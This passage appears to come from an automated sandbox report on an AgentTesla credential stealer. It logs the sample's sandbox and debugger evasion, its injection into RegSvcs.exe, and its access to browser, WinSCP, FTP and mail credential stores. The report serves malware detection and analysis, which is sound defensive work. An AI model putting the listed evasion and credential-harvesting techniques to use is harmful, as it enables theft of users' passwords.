                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599016Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598794Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598432Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598202Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597854Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597591Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597310Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595842Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595733Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595516Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595391Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595280Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594887Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594654Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594402Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594193Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593953Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599282Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599157Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598216Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597706Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597579Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595146Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595019Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594532Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594407Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593688Jump to behavior
                    Source: RegSvcs.exe, 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: unjuridically.exe, 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                    Source: unjuridically.exe, 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: RegSvcs.exe, 00000003.00000002.1761763756.0000000005830000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2850497763.00000000063A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeAPI call chain: ExitProcess graph end nodegraph_1-96251
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeAPI call chain: ExitProcess graph end nodegraph_1-94776
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeAPI call chain: ExitProcess graph end nodegraph_1-95285
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeAPI call chain: ExitProcess graph end node

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00AD7070 CheckRemoteDebuggerPresent,3_2_00AD7070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00186AAF BlockInput,1_2_00186AAF
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00133D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00133D19
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00163920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,1_2_00163920
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0023AF60 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,1_2_0023AF60
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0177E470 mov eax, dword ptr fs:[00000030h]1_2_0177E470
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0177E410 mov eax, dword ptr fs:[00000030h]1_2_0177E410
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0177CDD0 mov eax, dword ptr fs:[00000030h]1_2_0177CDD0
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_015AE470 mov eax, dword ptr fs:[00000030h]2_2_015AE470
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_015AE4D0 mov eax, dword ptr fs:[00000030h]2_2_015AE4D0
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_015ACE30 mov eax, dword ptr fs:[00000030h]2_2_015ACE30
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 6_2_018C6EB0 mov eax, dword ptr fs:[00000030h]6_2_018C6EB0
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 6_2_018C8550 mov eax, dword ptr fs:[00000030h]6_2_018C8550
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 6_2_018C84F0 mov eax, dword ptr fs:[00000030h]6_2_018C84F0
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_0016A66C
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00158189 SetUnhandledExceptionFilter,1_2_00158189
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001581AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_001581AC
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FF81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00FF81AC
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeCode function: 2_2_00FF8189 SetUnhandledExceptionFilter,2_2_00FF8189
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5B6008Jump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F62008Jump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016B106 LogonUserW,1_2_0016B106
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00133D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,1_2_00133D19
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0017411C SendInput,keybd_event,1_2_0017411C
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001774BB mouse_event,1_2_001774BB
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\XoRPyi5s1i.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Lityerses\unjuridically.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Lityerses\unjuridically.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Lityerses\unjuridically.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0016A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_0016A66C
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001771FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_001771FA
                    Source: XoRPyi5s1i.exe, unjuridically.exeBinary or memory string: Shell_TrayWnd
                    Source: XoRPyi5s1i.exe, 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp, unjuridically.exe, 00000002.00000002.1635324675.000000000107E000.00000040.00000001.01000000.00000004.sdmp, unjuridically.exe, 00000006.00000002.1756799947.000000000107E000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001565C4 cpuid 1_2_001565C4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0018091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,1_2_0018091D
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_001AB340 GetUserNameW,1_2_001AB340
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_00161E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_00161E8E
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeCode function: 1_2_0014DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,1_2_0014DDC0
                    Source: C:\Users\user\Desktop\XoRPyi5s1i.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.unjuridically.exe.f60000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.unjuridically.exe.1190000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.unjuridically.exe.f60000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.unjuridically.exe.1190000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1759111778.000000000264E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2847350109.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1635227729.0000000000F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.1757155715.0000000001190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1759111778.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1755639196.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2847350109.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 1936, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1712, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: unjuridically.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6796, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
